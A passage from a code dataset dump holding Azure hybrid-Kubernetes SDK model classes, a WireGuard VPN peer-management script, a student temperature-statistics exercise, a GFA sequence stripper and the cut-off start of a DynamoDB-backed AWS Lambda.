or ~azure.mgmt.hybridkubernetes.models.ConnectivityStatus\n \"\"\"\n\n _validation = {\n \"id\": {\"readonly\": True},\n \"name\": {\"readonly\": True},\n \"type\": {\"readonly\": True},\n \"location\": {\"required\": True},\n \"identity\": {\"required\": True},\n \"system_data\": {\"readonly\": True},\n \"agent_public_key_certificate\": {\"required\": True},\n \"kubernetes_version\": {\"readonly\": True},\n \"total_node_count\": {\"readonly\": True},\n \"total_core_count\": {\"readonly\": True},\n \"agent_version\": {\"readonly\": True},\n \"offering\": {\"readonly\": True},\n \"managed_identity_certificate_expiration_time\": {\"readonly\": True},\n \"last_connectivity_time\": {\"readonly\": True},\n \"connectivity_status\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"id\": {\"key\": \"id\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"type\": {\"key\": \"type\", \"type\": \"str\"},\n \"tags\": {\"key\": \"tags\", \"type\": \"{str}\"},\n \"location\": {\"key\": \"location\", \"type\": \"str\"},\n \"identity\": {\"key\": \"identity\", \"type\": \"ConnectedClusterIdentity\"},\n \"system_data\": {\"key\": \"systemData\", \"type\": \"SystemData\"},\n \"agent_public_key_certificate\": {\"key\": \"properties.agentPublicKeyCertificate\", \"type\": \"str\"},\n \"kubernetes_version\": {\"key\": \"properties.kubernetesVersion\", \"type\": \"str\"},\n \"total_node_count\": {\"key\": \"properties.totalNodeCount\", \"type\": \"int\"},\n \"total_core_count\": {\"key\": \"properties.totalCoreCount\", \"type\": \"int\"},\n \"agent_version\": {\"key\": \"properties.agentVersion\", \"type\": \"str\"},\n \"provisioning_state\": {\"key\": \"properties.provisioningState\", \"type\": \"str\"},\n \"distribution\": {\"key\": \"properties.distribution\", \"type\": \"str\"},\n \"infrastructure\": {\"key\": \"properties.infrastructure\", \"type\": \"str\"},\n \"offering\": {\"key\": \"properties.offering\", \"type\": \"str\"},\n \"managed_identity_certificate_expiration_time\": {\n \"key\": \"properties.managedIdentityCertificateExpirationTime\",\n \"type\": \"iso-8601\",\n },\n \"last_connectivity_time\": {\"key\": \"properties.lastConnectivityTime\", \"type\": \"iso-8601\"},\n \"connectivity_status\": {\"key\": \"properties.connectivityStatus\", \"type\": \"str\"},\n }\n\n def __init__(\n self,\n *,\n location: str,\n identity: \"_models.ConnectedClusterIdentity\",\n agent_public_key_certificate: str,\n tags: Optional[Dict[str, str]] = None,\n provisioning_state: Optional[Union[str, \"_models.ProvisioningState\"]] = None,\n distribution: Optional[str] = None,\n infrastructure: Optional[str] = None,\n **kwargs\n ):\n \"\"\"\n :keyword tags: Resource tags.\n :paramtype tags: dict[str, str]\n :keyword location: The geo-location where the resource lives. Required.\n :paramtype location: str\n :keyword identity: The identity of the connected cluster. Required.\n :paramtype identity: ~azure.mgmt.hybridkubernetes.models.ConnectedClusterIdentity\n :keyword agent_public_key_certificate: Base64 encoded public certificate used by the agent to\n do the initial handshake to the backend services in Azure. Required.\n :paramtype agent_public_key_certificate: str\n :keyword provisioning_state: Provisioning state of the connected cluster resource. Known values\n are: \"Succeeded\", \"Failed\", \"Canceled\", \"Provisioning\", \"Updating\", \"Deleting\", and \"Accepted\".\n :paramtype provisioning_state: str or ~azure.mgmt.hybridkubernetes.models.ProvisioningState\n :keyword distribution: The Kubernetes distribution running on this connected cluster.\n :paramtype distribution: str\n :keyword infrastructure: The infrastructure on which the Kubernetes cluster represented by this\n connected cluster is running on.\n :paramtype infrastructure: str\n \"\"\"\n super().__init__(tags=tags, location=location, **kwargs)\n self.identity = identity\n self.system_data = None\n self.agent_public_key_certificate = agent_public_key_certificate\n self.kubernetes_version = None\n self.total_node_count = None\n self.total_core_count = None\n self.agent_version = None\n self.provisioning_state = provisioning_state\n self.distribution = distribution\n self.infrastructure = infrastructure\n self.offering = None\n self.managed_identity_certificate_expiration_time = None\n self.last_connectivity_time = None\n self.connectivity_status = None\n\n\nclass ConnectedClusterIdentity(_serialization.Model):\n \"\"\"Identity for the connected cluster.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n All required parameters must be populated in order to send to Azure.\n\n :ivar principal_id: The principal id of connected cluster identity. This property will only be\n provided for a system assigned identity.\n :vartype principal_id: str\n :ivar tenant_id: The tenant id associated with the connected cluster. This property will only\n be provided for a system assigned identity.\n :vartype tenant_id: str\n :ivar type: The type of identity used for the connected cluster. The type 'SystemAssigned,\n includes a system created identity. The type 'None' means no identity is assigned to the\n connected cluster. Known values are: \"None\" and \"SystemAssigned\".\n :vartype type: str or ~azure.mgmt.hybridkubernetes.models.ResourceIdentityType\n \"\"\"\n\n _validation = {\n \"principal_id\": {\"readonly\": True},\n \"tenant_id\": {\"readonly\": True},\n \"type\": {\"required\": True},\n }\n\n _attribute_map = {\n \"principal_id\": {\"key\": \"principalId\", \"type\": \"str\"},\n \"tenant_id\": {\"key\": \"tenantId\", \"type\": \"str\"},\n \"type\": {\"key\": \"type\", \"type\": \"str\"},\n }\n\n def __init__(self, *, type: Union[str, \"_models.ResourceIdentityType\"] = \"SystemAssigned\", **kwargs):\n \"\"\"\n :keyword type: The type of identity used for the connected cluster. The type 'SystemAssigned,\n includes a system created identity. The type 'None' means no identity is assigned to the\n connected cluster. Known values are: \"None\" and \"SystemAssigned\".\n :paramtype type: str or ~azure.mgmt.hybridkubernetes.models.ResourceIdentityType\n \"\"\"\n super().__init__(**kwargs)\n self.principal_id = None\n self.tenant_id = None\n self.type = type\n\n\nclass ConnectedClusterList(_serialization.Model):\n \"\"\"The paginated list of connected Clusters.\n\n :ivar value: The list of connected clusters.\n :vartype value: list[~azure.mgmt.hybridkubernetes.models.ConnectedCluster]\n :ivar next_link: The link to fetch the next page of connected cluster.\n :vartype next_link: str\n \"\"\"\n\n _attribute_map = {\n \"value\": {\"key\": \"value\", \"type\": \"[ConnectedCluster]\"},\n \"next_link\": {\"key\": \"nextLink\", \"type\": \"str\"},\n }\n\n def __init__(\n self, *, value: Optional[List[\"_models.ConnectedCluster\"]] = None, next_link: Optional[str] = None, **kwargs\n ):\n \"\"\"\n :keyword value: The list of connected clusters.\n :paramtype value: list[~azure.mgmt.hybridkubernetes.models.ConnectedCluster]\n :keyword next_link: The link to fetch the next page of connected cluster.\n :paramtype next_link: str\n \"\"\"\n super().__init__(**kwargs)\n self.value = value\n self.next_link = next_link\n\n\nclass ConnectedClusterPatch(_serialization.Model):\n \"\"\"Object containing updates for patch operations.\n\n :ivar tags: Resource tags.\n :vartype tags: dict[str, str]\n :ivar properties: Describes the connected cluster resource properties that can be updated\n during PATCH operation.\n :vartype properties: JSON\n \"\"\"\n\n _attribute_map = {\n \"tags\": {\"key\": \"tags\", \"type\": \"{str}\"},\n \"properties\": {\"key\": \"properties\", \"type\": \"object\"},\n }\n\n def __init__(self, *, tags: Optional[Dict[str, str]] = None, properties: Optional[JSON] = None, **kwargs):\n \"\"\"\n :keyword tags: Resource tags.\n :paramtype tags: dict[str, str]\n :keyword properties: Describes the connected cluster resource properties that can be updated\n during PATCH operation.\n :paramtype properties: JSON\n \"\"\"\n super().__init__(**kwargs)\n self.tags = tags\n self.properties = properties\n\n\nclass CredentialResult(_serialization.Model):\n \"\"\"The credential result response.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar name: The name of the credential.\n :vartype name: str\n :ivar value: Base64-encoded Kubernetes configuration file.\n :vartype value: bytes\n \"\"\"\n\n _validation = {\n \"name\": {\"readonly\": True},\n \"value\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"value\": {\"key\": \"value\", \"type\": \"bytearray\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.name = None\n self.value = None\n\n\nclass CredentialResults(_serialization.Model):\n \"\"\"The list of credential result response.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar hybrid_connection_config: Contains the REP (rendezvous endpoint) and “Sender” access\n token.\n :vartype hybrid_connection_config: ~azure.mgmt.hybridkubernetes.models.HybridConnectionConfig\n :ivar kubeconfigs: Base64-encoded Kubernetes configuration file.\n :vartype kubeconfigs: list[~azure.mgmt.hybridkubernetes.models.CredentialResult]\n \"\"\"\n\n _validation = {\n \"hybrid_connection_config\": {\"readonly\": True},\n \"kubeconfigs\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"hybrid_connection_config\": {\"key\": \"hybridConnectionConfig\", \"type\": \"HybridConnectionConfig\"},\n \"kubeconfigs\": {\"key\": \"kubeconfigs\", \"type\": \"[CredentialResult]\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.hybrid_connection_config = None\n self.kubeconfigs = None\n\n\nclass ErrorAdditionalInfo(_serialization.Model):\n \"\"\"The resource management error additional info.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar type: The additional info type.\n :vartype type: str\n :ivar info: The additional info.\n :vartype info: JSON\n \"\"\"\n\n _validation = {\n \"type\": {\"readonly\": True},\n \"info\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"type\": {\"key\": \"type\", \"type\": \"str\"},\n \"info\": {\"key\": \"info\", \"type\": \"object\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.type = None\n self.info = None\n\n\nclass ErrorDetail(_serialization.Model):\n \"\"\"The error detail.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar code: The error code.\n :vartype code: str\n :ivar message: The error message.\n :vartype message: str\n :ivar target: The error target.\n :vartype target: str\n :ivar details: The error details.\n :vartype details: list[~azure.mgmt.hybridkubernetes.models.ErrorDetail]\n :ivar additional_info: The error additional info.\n :vartype additional_info: list[~azure.mgmt.hybridkubernetes.models.ErrorAdditionalInfo]\n \"\"\"\n\n _validation = {\n \"code\": {\"readonly\": True},\n \"message\": {\"readonly\": True},\n \"target\": {\"readonly\": True},\n \"details\": {\"readonly\": True},\n \"additional_info\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"code\": {\"key\": \"code\", \"type\": \"str\"},\n \"message\": {\"key\": \"message\", \"type\": \"str\"},\n \"target\": {\"key\": \"target\", \"type\": \"str\"},\n \"details\": {\"key\": \"details\", \"type\": \"[ErrorDetail]\"},\n \"additional_info\": {\"key\": \"additionalInfo\", \"type\": \"[ErrorAdditionalInfo]\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.code = None\n self.message = None\n self.target = None\n self.details = None\n self.additional_info = None\n\n\nclass ErrorResponse(_serialization.Model):\n \"\"\"Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.).\n\n :ivar error: The error object.\n :vartype error: ~azure.mgmt.hybridkubernetes.models.ErrorDetail\n \"\"\"\n\n _attribute_map = {\n \"error\": {\"key\": \"error\", \"type\": \"ErrorDetail\"},\n }\n\n def __init__(self, *, error: Optional[\"_models.ErrorDetail\"] = None, **kwargs):\n \"\"\"\n :keyword error: The error object.\n :paramtype error: ~azure.mgmt.hybridkubernetes.models.ErrorDetail\n \"\"\"\n super().__init__(**kwargs)\n self.error = error\n\n\nclass HybridConnectionConfig(_serialization.Model):\n \"\"\"Contains the REP (rendezvous endpoint) and “Sender” access token.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar expiration_time: Timestamp when this token will be expired.\n :vartype expiration_time: int\n :ivar hybrid_connection_name: Name of the connection.\n :vartype hybrid_connection_name: str\n :ivar relay: Name of the relay.\n :vartype relay: str\n :ivar token: Sender access token.\n :vartype token: str\n \"\"\"\n\n _validation = {\n \"expiration_time\": {\"readonly\": True},\n \"hybrid_connection_name\": {\"readonly\": True},\n \"relay\": {\"readonly\": True},\n \"token\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"expiration_time\": {\"key\": \"expirationTime\", \"type\": \"int\"},\n \"hybrid_connection_name\": {\"key\": \"hybridConnectionName\", \"type\": \"str\"},\n \"relay\": {\"key\": \"relay\", \"type\": \"str\"},\n \"token\": {\"key\": \"token\", \"type\": \"str\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.expiration_time = None\n self.hybrid_connection_name = None\n self.relay = None\n self.token = None\n\n\nclass ListClusterUserCredentialProperties(_serialization.Model):\n \"\"\"ListClusterUserCredentialProperties.\n\n All required parameters must be populated in order to send to Azure.\n\n :ivar authentication_method: The mode of client authentication. Required. Known values are:\n \"Token\" and \"AAD\".\n :vartype authentication_method: str or ~azure.mgmt.hybridkubernetes.models.AuthenticationMethod\n :ivar client_proxy: Boolean value to indicate whether the request is for client side proxy or\n not. Required.\n :vartype client_proxy: bool\n \"\"\"\n\n _validation = {\n \"authentication_method\": {\"required\": True},\n \"client_proxy\": {\"required\": True},\n }\n\n _attribute_map = {\n \"authentication_method\": {\"key\": \"authenticationMethod\", \"type\": \"str\"},\n \"client_proxy\": {\"key\": \"clientProxy\", \"type\": \"bool\"},\n }\n\n def __init__(\n self, *, authentication_method: Union[str, \"_models.AuthenticationMethod\"], client_proxy: bool, **kwargs\n ):\n \"\"\"\n :keyword authentication_method: The mode of client authentication. Required. Known values are:\n \"Token\" and \"AAD\".\n :paramtype authentication_method: str or\n ~azure.mgmt.hybridkubernetes.models.AuthenticationMethod\n :keyword client_proxy: Boolean value to indicate whether the request is for client side proxy\n or not. Required.\n :paramtype client_proxy: bool\n \"\"\"\n super().__init__(**kwargs)\n self.authentication_method = authentication_method\n self.client_proxy = client_proxy\n\n\nclass Operation(_serialization.Model):\n \"\"\"The Connected cluster API operation.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar name: Operation name: {Microsoft.Kubernetes}/{resource}/{operation}.\n :vartype name: str\n :ivar display: The object that represents the operation.\n :vartype display: ~azure.mgmt.hybridkubernetes.models.OperationDisplay\n \"\"\"\n\n _validation = {\n \"name\": {\"readonly\": True},\n \"display\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"display\": {\"key\": \"display\", \"type\": \"OperationDisplay\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.name = None\n self.display = None\n\n\nclass OperationDisplay(_serialization.Model):\n \"\"\"The object that represents the operation.\n\n :ivar provider: Service provider: Microsoft.connectedClusters.\n :vartype provider: str\n :ivar resource: Connected Cluster Resource on which the operation is performed.\n :vartype resource: str\n :ivar operation: Operation type: Read, write, delete, etc.\n :vartype operation: str\n :ivar description: Description of the operation.\n :vartype description: str\n \"\"\"\n\n _attribute_map = {\n \"provider\": {\"key\": \"provider\", \"type\": \"str\"},\n \"resource\": {\"key\": \"resource\", \"type\": \"str\"},\n \"operation\": {\"key\": \"operation\", \"type\": \"str\"},\n \"description\": {\"key\": \"description\", \"type\": \"str\"},\n }\n\n def __init__(\n self,\n *,\n provider: Optional[str] = None,\n resource: Optional[str] = None,\n operation: Optional[str] = None,\n description: Optional[str] = None,\n **kwargs\n ):\n \"\"\"\n :keyword provider: Service provider: Microsoft.connectedClusters.\n :paramtype provider: str\n :keyword resource: Connected Cluster Resource on which the operation is performed.\n :paramtype resource: str\n :keyword operation: Operation type: Read, write, delete, etc.\n :paramtype operation: str\n :keyword description: Description of the operation.\n :paramtype description: str\n \"\"\"\n super().__init__(**kwargs)\n self.provider = provider\n self.resource = resource\n self.operation = operation\n self.description = description\n\n\nclass OperationList(_serialization.Model):\n \"\"\"The paginated list of connected cluster API operations.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar value: The list of connected cluster API operations.\n :vartype value: list[~azure.mgmt.hybridkubernetes.models.Operation]\n :ivar next_link: The link to fetch the next page of connected cluster API operations.\n :vartype next_link: str\n \"\"\"\n\n _validation = {\n \"value\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"value\": {\"key\": \"value\", \"type\": \"[Operation]\"},\n \"next_link\": {\"key\": \"nextLink\", \"type\": \"str\"},\n }\n\n def __init__(self, *, next_link: Optional[str] = None, **kwargs):\n \"\"\"\n :keyword next_link: The link to fetch the next page of connected cluster API operations.\n :paramtype next_link: str\n \"\"\"\n super().__init__(**kwargs)\n self.value = None\n self.next_link = next_link\n\n\nclass SystemData(_serialization.Model):\n \"\"\"Metadata pertaining to creation and last modification of the resource.\n\n :ivar created_by: The identity that created the resource.\n :vartype created_by: str\n :ivar created_by_type: The type of identity that created the resource. Known values are:\n \"User\", \"Application\", \"ManagedIdentity\", and \"Key\".\n :vartype created_by_type: str or ~azure.mgmt.hybridkubernetes.models.CreatedByType\n :ivar created_at: The timestamp of resource creation (UTC).\n :vartype created_at: ~datetime.datetime\n :ivar last_modified_by: The identity that last modified the resource.\n :vartype last_modified_by: str\n :ivar last_modified_by_type: The type of identity that last modified the resource. Known values\n are: \"User\", \"Application\", \"ManagedIdentity\", and \"Key\".\n :vartype last_modified_by_type: str or ~azure.mgmt.hybridkubernetes.models.LastModifiedByType\n :ivar last_modified_at: The timestamp of resource modification (UTC).\n :vartype last_modified_at: ~datetime.datetime\n \"\"\"\n\n _attribute_map = {\n \"created_by\": {\"key\": \"createdBy\", \"type\": \"str\"},\n \"created_by_type\": {\"key\": \"createdByType\", \"type\": \"str\"},\n \"created_at\": {\"key\": \"createdAt\", \"type\": \"iso-8601\"},\n \"last_modified_by\": {\"key\": \"lastModifiedBy\", \"type\": \"str\"},\n \"last_modified_by_type\": {\"key\": \"lastModifiedByType\", \"type\": \"str\"},\n \"last_modified_at\": {\"key\": \"lastModifiedAt\", \"type\": \"iso-8601\"},\n }\n\n def __init__(\n self,\n *,\n created_by: Optional[str] = None,\n created_by_type: Optional[Union[str, \"_models.CreatedByType\"]] = None,\n created_at: Optional[datetime.datetime] = None,\n last_modified_by: Optional[str] = None,\n last_modified_by_type: Optional[Union[str, \"_models.LastModifiedByType\"]] = None,\n last_modified_at: Optional[datetime.datetime] = None,\n **kwargs\n ):\n \"\"\"\n :keyword created_by: The identity that created the resource.\n :paramtype created_by: str\n :keyword created_by_type: The type of identity that created the resource. Known values are:\n \"User\", \"Application\", \"ManagedIdentity\", and \"Key\".\n :paramtype created_by_type: str or ~azure.mgmt.hybridkubernetes.models.CreatedByType\n :keyword created_at: The timestamp of resource creation (UTC).\n :paramtype created_at: ~datetime.datetime\n :keyword last_modified_by: The identity that last modified the resource.\n :paramtype last_modified_by: str\n :keyword last_modified_by_type: The type of identity that last modified the resource. Known\n values are: \"User\", \"Application\", \"ManagedIdentity\", and \"Key\".\n :paramtype last_modified_by_type: str or ~azure.mgmt.hybridkubernetes.models.LastModifiedByType\n :keyword last_modified_at: The timestamp of resource modification (UTC).\n :paramtype last_modified_at: ~datetime.datetime\n \"\"\"\n super().__init__(**kwargs)\n self.created_by = created_by\n self.created_by_type = created_by_type\n self.created_at = created_at\n self.last_modified_by = last_modified_by\n self.last_modified_by_type = last_modified_by_type\n self.last_modified_at = last_modified_at\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/hybridkubernetes/azure-mgmt-hybridkubernetes/azure/mgmt/hybridkubernetes/models/_models_py3.py","file_name":"_models_py3.py","file_ext":"py","file_size_in_byte":29248,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"9781715705","text":"\"\"\"Provides utilities to manage the wireguard VPN\"\"\"\nimport re\nimport subprocess\n\nimport wireguard\nimport boto3\nimport werkzeug.utils as wutils\n\nimport config\nfrom app import dynamodb\n\nConfig = config.WireGuardConfig\nconfig_files = [\"wg0.conf\",\"wg0-peers.conf\"]\n\ndef add_peer(peer_name,id):\n \"\"\"add peer to config\"\"\"\n server = wireguard.Server(\n description=Config.SERVER_DESCRIPTION,\n subnet=Config.SERVER_SUBNET,\n address=Config.SERVER_ADDRESS,\n private_key=Config.PRIVATE_KEY\n )\n peer = server.peer(\n description=f\"{peer_name}#{id}\"\n )\n server.config().write(config_path=Config.TEMP_CONFIG_PATH)\n with open(\n f'{Config.TEMP_CONFIG_PATH}/wg0.conf',\n \"r+\",\n encoding=\"UTF-8\") as temp_config:\n content = temp_config.read()\n content = re.sub(\n r\"%i .*wg0-peers.conf$\",\n f'%i {Config.PRODUCTION_CONFIG_PATH}/wg0-peers.conf;' \\\n 'iptables -A FORWARD -i %i -j ACCEPT;' \\\n 'iptables -A FORWARD -o %i -j ACCEPT;' \\\n f\"iptables -t nat -A POSTROUTING -o {Config.NET_INTERFACE} -j MASQUERADE\",\n content)\n content += \\\n '\\nPostDown = iptables -D FORWARD -i %i -j ACCEPT;' \\\n 'iptables -D FORWARD -o %i -j ACCEPT;' \\\n f'iptables -t nat -D POSTROUTING -o {Config.NET_INTERFACE} -j MASQUERADE'\n with open(\n f'{Config.PRODUCTION_CONFIG_PATH}/wg0.conf',\n \"w\",\n encoding=\"UTF-8\") as production_config:\n production_config.write(content)\n\n with open(\n f\"{Config.PRODUCTION_CONFIG_PATH}/wg0-peers.conf\",\n \"a+\",\n encoding=\"UTF-8\") as production_config:\n content = production_config.read()\n content += server.config().peers\n production_config.write(content)\n\n dynamodb.add_peer(\n id=id,\n peer_name=peer_name,\n public_key=peer.public_key,\n allowed_ips=str(peer.allowed_ips))\n local_config = re.sub(r\"ListenPort = \\d+\",\"\",peer.config().local_config)\n local_config = re.sub(\n r\"AllowedIPs = \\d+\\.\\d+\\.\\d+\\.\\d+\\/\\d{1,2}\\n\",\n f\"AllowedIPs = {Config.ALLOWED_IPS}\\n\",\n local_config)\n local_config = local_config.replace(\"[Interface]\\n\",f\"[Interface]\\nDNS = {Config.DNS}\\n\")\n local_config += f\"Endpoint = {Config.ENDPOINT}\\n\"\n local_config += f'PersistentKeepalive = {Config.KEEPALIVE}'\n filename = wutils.secure_filename(f'{peer_name}.conf')\n save_config()\n subprocess.Popen(\n '/bin/bash -c \"wg syncconf wg0 <(wg-quick strip wg0 && wg-quick strip wg0-peers)\"',\n shell=True)\n return filename,local_config\n\ndef remove_peer(peer_name,id):\n \"\"\"Revoke a peer in the peers configuration file and database\"\"\"\n with open(\n f\"{Config.PRODUCTION_CONFIG_PATH}/wg0-peers.conf\",\n \"r+\",\n encoding=\"UTF-8\") as production_config:\n content = production_config.read()\n remove_regex = r\"\\[Peer\\]\\nAllowedIPs = \\d+\\.\\d+\\.\\d+\\.\\d+\\/\\d{1,2}\\n# \" + \\\n re.escape(f\"{peer_name}#{id}\") + \\\n r\"\\nPublicKey = .*=\"\n content = re.sub(remove_regex,\"\",content)\n content = re.sub(r'^\\n',\"\",content)\n production_config.truncate(0)\n production_config.seek(0)\n production_config.write(content)\n dynamodb.remove_peer(peer_name=peer_name,id=id)\n save_config()\n subprocess.Popen(\n '/bin/bash -c \"wg syncconf wg0 <(wg-quick strip wg0 && wg-quick strip wg0-peers)\"',\n shell=True)\n\ndef save_config():\n \"\"\"Save the wireguard configuration files to AWS S3\"\"\"\n s3 = boto3.client(\"s3\")\n for file in config_files:\n s3.upload_file(\n Filename=f\"{Config.PRODUCTION_CONFIG_PATH}/{file}\",\n Bucket=\"vpnenrollment\",\n Key=f\"config/{file}\"\n )\ndef retrieve_config():\n \"\"\"Retrieve the wireguard configuration files from AWS S3\"\"\"\n s3 = boto3.client(\"s3\")\n for file in config_files:\n s3.download_file(\n Bucket=\"vpnenrollment\",\n Key=f\"config/{file}\",\n Filename=f\"{Config.PRODUCTION_CONFIG_PATH}/{file}\"\n )\n ","repo_name":"Inner-daydream/vpn-enrollment","sub_path":"app/wireguard_management.py","file_name":"wireguard_management.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26437681853","text":"# ENTRADAS\ntempMax = 0\ntempMin = 0\n\n# SALIDAS\ntotalDias = 0\ntotalDiasError = 0\ndiasErrorBajas = 0\ndiasErrorAltas = 0\ndiasErrorAmbas = 0\ntempBajas = 0\ntempAltas = 0\ntempBajasAltas = 0\ntotalTempMediaMinima = 0\ntotalTempMediaMaxima = 0 \ncontadorTempMediaMinima = 0\ntempMediaMaxima = 0\ncontadorTempMediaMaxima = 0\n\nwhile (True):\n tempMax = int (input (\"temp Maxima: \"))\n tempMin = int (input (\"temp Minima: \"))\n #tempMax = int (input ())\n #tempMin = int (input ())\n if (tempMin==0 and tempMax==0):\n break\n totalDias = 1 + totalDias\n \n if (tempMin < 5 and tempMax > 35):\n tempBajas += 1 \n tempAltas += 1 \n #diasErrorBajas += 1 \n #diasErrorAltas += 1 \n diasErrorAmbas += 1 \n totalDiasError +=1\n elif (tempMin < 5):\n tempBajas += 1 \n diasErrorBajas += 1 \n totalDiasError +=1\n elif (tempMax > 35):\n tempAltas += 1 \n diasErrorAltas += 1 \n totalDiasError +=1\n else:\n totalTempMediaMinima = tempMin + totalTempMediaMinima\n contadorTempMediaMinima = 1 + contadorTempMediaMinima\n totalTempMediaMaxima = tempMax + totalTempMediaMaxima\n contadorTempMediaMaxima = 1 + contadorTempMediaMaxima\n#\nprint (totalDias)\nprint (totalDiasError)\nprint (diasErrorBajas)\nprint (diasErrorAltas)\nprint (diasErrorAmbas)\n\ntempMediaMinima = totalTempMediaMinima / contadorTempMediaMinima\ntempMediaMaxima = totalTempMediaMaxima / contadorTempMediaMinima\nprint (tempMediaMaxima)\nporcentajeDiasErrores = totalDiasError/totalDias * 100\nprint (tempMediaMinima)\ntempMediaMaxima = totalTempMediaMaxima / contadorTempMediaMaxima\nprint (porcentajeDiasErrores)\n\n#print(\"\")\n#print (\"Total dias: \", totalDias)\n#print (\"Total dias error: \", totalDiasError)\n#print (\"Total dias error bajas temp: \", diasErrorBajas)\n#print (\"Total dias error altas temp: \", diasErrorAltas)\n#print (\"Total dias error ambas: \", diasErrorAmbas)\n#\n#tempMediaMinima = totalTempMediaMinima / contadorTempMediaMinima\n#tempMediaMaxima = totalTempMediaMaxima / contadorTempMediaMinima\n#print (\"Temp media maxima: \", tempMediaMaxima)\n#porcentajeDiasErrores = totalDiasError/totalDias * 100\n#print (\"Temp media minima: \", tempMediaMinima)\n#tempMediaMaxima = totalTempMediaMaxima / contadorTempMediaMaxima\n\n\n \n \n \n \n \n\n","repo_name":"lgarreta/lgcursos","sub_path":"MinTIC2021/ciclo01-python/Retos/Reto3-Semana4/reto3-ciclos.py","file_name":"reto3-ciclos.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1016880576","text":"import argparse\nimport os\n\n\ndef strip_gfa_sequence(gfa_path):\n output_path = '.'.join(gfa_path.split('.')[:-1]) + \"_no-sequence.gfa\"\n\n print(output_path)\n\n with open(gfa_path, 'r') as file, open(output_path, 'w') as output_file:\n for line in file:\n if line.startswith(\"S\"):\n line = line.split()\n line[2] = ''\n line = '\\t'.join(line) + '\\n'\n\n output_file.write(line)\n\n else:\n output_file.write(line)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-i\",\n required=True,\n type=str\n )\n\n args = parser.parse_args()\n\n strip_gfa_sequence(args.i)\n","repo_name":"rlorigro/GFAse","sub_path":"scripts/strip_gfa_sequence.py","file_name":"strip_gfa_sequence.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"54"} +{"seq_id":"6873249921","text":"import base64\nimport json\nimport boto3\nfrom datetime import datetime\nimport time\nimport os\nimport random\n\nprint('Loading function')\n\n# DDB Table name\nTABLE_NAME = os.environ['TABLE_NAME']\n\n# DDB Batch Size Max\nDDB_BATCH_SIZE = 100\n\n# cache timeout in seconds\nCACHE_TIMEOUT = 15*60 # 15 minutes\n\n# default encoding of bytes in the posted record\nENCODING = 'utf-8'\n\nclass Cache:\n def __init__(self, age):\n self.age = age\n self.store = {}\n\n def get(self, key):\n if key in self.store:\n v = self.store[key]\n exp = v['expiry']\n now = time.time()\n if(now < exp):\n return v['data']\n else:\n self.store.pop(key)\n return None\n\n def put(self, key, data):\n exp = time.time() + self.age\n self.store[key] = {\n 'expiry' : exp,\n 'data' : data\n }\n\nclass Database:\n def __init__(self, ddb):\n self.ddb = ddb\n self.cache = Cache(CACHE_TIMEOUT)\n\n\n def queryDDB(self, device_id_list, response):\n attempt = 0\n # loop with delay until MAX_ATTEMPTS or we have no more unprocessed records\n while(attempt < MAX_ATTEMPTS):\n unprocessed = []\n self.batchQueryDDB(device_id_list, response, unprocessed)\n if(len(unprocessed) == 0):\n break\n else:\n delay = expBackoffFullJitter(attempt)\n time.sleep(delay)\n attempt += 1\n device_id_list = unprocessed\n\n def batchQueryDDB(self, device_id_list, response, unprocessed):\n print(\"Querying details for {} devices from DynamoDB\".format(len(device_id_list)))\n\n for i in range(0, len(device_id_list), DDB_BATCH_SIZE):\n keys = []\n j = i\n while j < len(device_id_list) and j < (i + DDB_BATCH_SIZE):\n device_id = device_id_list[j]\n j += 1\n keys.append({\n 'device_id' : device_id\n })\n\n\n result = self.ddb.batch_get_item(\n RequestItems = {\n TABLE_NAME : {\n 'Keys' : keys\n }\n }\n )\n\n for r in result['Responses'][TABLE_NAME]:\n device_id = r['device_id']\n\n device_details = {\n 'manufacturer' : r['manufacturer'],\n 'model' : r['model']\n }\n\n self.cache.put(device_id, device_details)\n response[device_id] = device_details\n\n unproc_count = 0\n if TABLE_NAME in result['UnprocessedKeys']:\n unproc = result['UnprocessedKeys'][TABLE_NAME][\"Keys\"]\n unproc_count = len(unproc)\n for u in unproc:\n unprocessed.append(u['device_id'])\n\n print(\"DDB Query: {} results, {} unprocessed out of {} keys\".format(\n len(result['Responses'][TABLE_NAME]),\n 